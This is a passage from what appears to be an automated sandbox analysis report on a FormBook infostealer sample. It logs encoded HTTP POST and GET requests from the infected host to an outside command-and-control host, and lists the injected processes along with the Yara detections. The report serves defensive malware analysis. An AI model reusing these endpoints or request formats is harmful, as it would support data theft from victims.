                                                       33 | 192.168.2.4 | 50027 | 203.161.42.73 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:30.740322113 CET | 650 | OUT | POST /gn26/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.brightvision.website
                                                      Origin: http://www.brightvision.website
                                                      Referer: http://www.brightvision.website/gn26/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 51 31 56 38 6c 4b 55 53 31 47 47 6a 68 70 4e 64 55 76 35 63 44 46 68 4c 76 4e 49 75 64 59 6a 6d 52 58 38 79 47 4d 59 6f 72 32 35 48 30 57 72 68 4a 6e 71 31 51 38 69 63 56 4c 32 75 36 4c 67 54 34 49 71 35 74 54 6a 7a 68 63 55 32 44 46 46 4d 42 61 31 56 61 4c 66 66 4c 2f 58 65 30 6d 41 55 75 6d 75 4b 74 32 50 37 52 47 34 4a 2f 45 71 77 50 44 50 30 51 70 35 67 77 4a 4b 54 51 78 75 41 4e 38 55 4a 2b 53 77 35 75 71 50 62 56 59 70 66 4d 44 46 63 6a 65 56 46 55 74 6e 4e 61 45 52 41 4c 6c 37 31 64 67 4a 74 55 63 70 49 6a 53 31 6c 58 51 37 6d 2f 51 3d 3d
                                                      Data Ascii: rfJh=SiBzWWJ1sOT3Q1V8lKUS1GGjhpNdUv5cDFhLvNIudYjmRX8yGMYor25H0WrhJnq1Q8icVL2u6LgT4Iq5tTjzhcU2DFFMBa1VaLffL/Xe0mAUumuKt2P7RG4J/EqwPDP0Qp5gwJKTQxuAN8UJ+Sw5uqPbVYpfMDFcjeVFUtnNaERALl71dgJtUcpIjS1lXQ7m/Q==
                                                       Dec 3, 2024 06:56:32.052464962 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:56:31 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                       Dec 3, 2024 06:56:32.052531958 CET | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                       Dec 3, 2024 06:56:32.052546024 CET | 1236 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                       Dec 3, 2024 06:56:32.052683115 CET | 1236 | IN | Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                      Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                       Dec 3, 2024 06:56:32.052746058 CET | 1236 | IN | Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                      Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                       Dec 3, 2024 06:56:32.052858114 CET | 1236 | IN | Data Raw: 35 31 2c 31 2e 35 32 31 36 35 20 30 2e 32 32 32 39 39 2c 31 2e 30 36 35 37 39 20 30 2e 31 34 39 33 33 2c 30 2e 36 30 39 31 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c
                                                      Data Ascii: 51,1.52165 0.22299,1.06579 0.14933,0.60912" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4533" d=
                                                       Dec 3, 2024 06:56:32.052867889 CET | 1236 | IN | Data Raw: 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20
                                                      Data Ascii: ke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4541" d="m 85.206367,122.98266 c 0.117841,11.74369 0.235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45
                                                       Dec 3, 2024 06:56:32.052877903 CET | 108 | IN | Data Raw: 2c 32 36 2e 37 30 30 33 33 20 2d 32 2e 32 39 38 33 39 34 2c 36 2e 39 35 33 36 32 20 2d 32 2e 32 39 38 33 39 34 2c 31 31 2e 35 34 39 32 32 20 2d 31 2e 33 35 35 34 31 39 2c 32 34 2e 35 37 34 31 35 20 30 2e 39 34 32 39 37 34 2c 31 33 2e 30 32 34 39
                                                      Data Ascii: ,26.70033 -2.298394,6.95362 -2.298394,11.54922 -1.355419,24.57415 0.942974,13.02493 2.828182,34.46917 5.0660
                                                       Dec 3, 2024 06:56:32.052886009 CET | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                      Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                       Dec 3, 2024 06:56:32.052895069 CET | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                      Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                       Dec 3, 2024 06:56:32.173650026 CET | 1236 | IN | Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                      Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       34 | 192.168.2.4 | 50034 | 203.161.42.73 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:33.402578115 CET | 670 | OUT | POST /gn26/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 221
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.brightvision.website
                                                      Origin: http://www.brightvision.website
                                                      Referer: http://www.brightvision.website/gn26/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 53 69 42 7a 57 57 4a 31 73 4f 54 33 52 55 6c 38 6a 72 55 53 39 47 47 67 39 35 4e 64 43 66 35 59 44 46 39 4c 76 49 70 70 64 71 33 6d 52 79 41 79 48 4e 59 6f 6f 32 35 48 37 32 72 6b 4e 6e 71 75 51 38 76 6a 56 4b 4b 75 36 50 77 54 34 4a 61 35 73 67 37 77 69 73 55 77 4d 6c 46 30 46 61 31 56 61 4c 66 66 4c 35 36 7a 30 6e 6f 55 75 57 2b 4b 73 58 4f 4a 59 6d 34 4b 34 45 71 77 4c 44 4f 39 51 70 34 46 77 49 57 71 51 33 71 41 4e 34 45 4a 2b 6a 77 36 68 71 4f 51 52 59 6f 49 4c 41 68 58 6b 4e 59 75 57 50 37 69 45 6b 6c 48 44 44 32 76 4d 52 6f 36 47 63 4e 37 2b 56 38 52 61 54 47 76 6b 55 55 6d 34 4c 43 43 31 32 2f 4a 37 67 58 75 43 4c 31 70 72 32 34 3d
                                                      Data Ascii: rfJh=SiBzWWJ1sOT3RUl8jrUS9GGg95NdCf5YDF9LvIppdq3mRyAyHNYoo25H72rkNnquQ8vjVKKu6PwT4Ja5sg7wisUwMlF0Fa1VaLffL56z0noUuW+KsXOJYm4K4EqwLDO9Qp4FwIWqQ3qAN4EJ+jw6hqOQRYoILAhXkNYuWP7iEklHDD2vMRo6GcN7+V8RaTGvkUUm4LCC12/J7gXuCL1pr24=
                                                       Dec 3, 2024 06:56:34.716044903 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:56:34 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                       Dec 3, 2024 06:56:34.716110945 CET | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                      Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                       Dec 3, 2024 06:56:34.716126919 CET | 1236 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                      Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                       Dec 3, 2024 06:56:34.716269016 CET | 1236 | IN | Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                                                      Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                                                       Dec 3, 2024 06:56:34.716279030 CET | 896 | IN | Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                                                      Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                                                       Dec 3, 2024 06:56:34.716288090 CET | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                      Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                       Dec 3, 2024 06:56:34.716298103 CET | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                      Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                       Dec 3, 2024 06:56:34.716306925 CET | 448 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                      Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                       Dec 3, 2024 06:56:34.716556072 CET | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                      Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                       Dec 3, 2024 06:56:34.716566086 CET | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                      Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                       Dec 3, 2024 06:56:34.836123943 CET | 1236 | IN | Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                      Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       35 | 192.168.2.4 | 50038 | 203.161.42.73 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 3, 2024 06:56:36.057744980 CET | 10752 | OUT | POST /gn26/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 10301
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.brightvision.website
                                                      Origin: http://www.brightvision.website
                                                      Referer: http://www.brightvision.website/gn26/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:56:37.436388016 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:56:37 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html


                                                      Session ID: 36
                                                      Source IP: 192.168.2.4
                                                      Source Port: 50039
                                                      Destination IP: 203.161.42.73
                                                      Destination Port: 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 3, 2024 06:56:38.989727974 CET | 371 | OUT | GET /gn26/?rfJh=fgpTVhEuh+HnR3p3mfMFhWHWnuNeMM4hCHlB5YwrT5j1SjgoO/sQ0W1xqV3uB3iqP4rffdiJ/shc0ougvjbd9KgaN0dmEc5ka6rkf4Wz0wYWqHeygGDkXS8=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.brightvision.website
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:56:40.307801008 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:56:40 GMT
                                                      Server: Apache
                                                      Content-Length: 16052
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8


                                                      Target ID:0
                                                      Start time:00:53:32
                                                      Start date:03/12/2024
                                                      Path:C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"
                                                      Imagebase:0x7c0000
                                                      File size:1'213'952 bytes
                                                      MD5 hash:36E50660F18927EB838CE85DD46778C4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:00:53:33
                                                      Start date:03/12/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe"
                                                      Imagebase:0x690000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:00:53:45
                                                      Start date:03/12/2024
                                                      Path:C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe"
                                                      Imagebase:0xcc0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:3
                                                      Start time:00:53:46
                                                      Start date:03/12/2024
                                                      Path:C:\Windows\SysWOW64\mobsync.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\mobsync.exe"
                                                      Imagebase:0x570000
                                                      File size:93'696 bytes
                                                      MD5 hash:F7114D05B442F103BD2D3E20E78A7AA5
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:00:54:00
                                                      Start date:03/12/2024
                                                      Path:C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
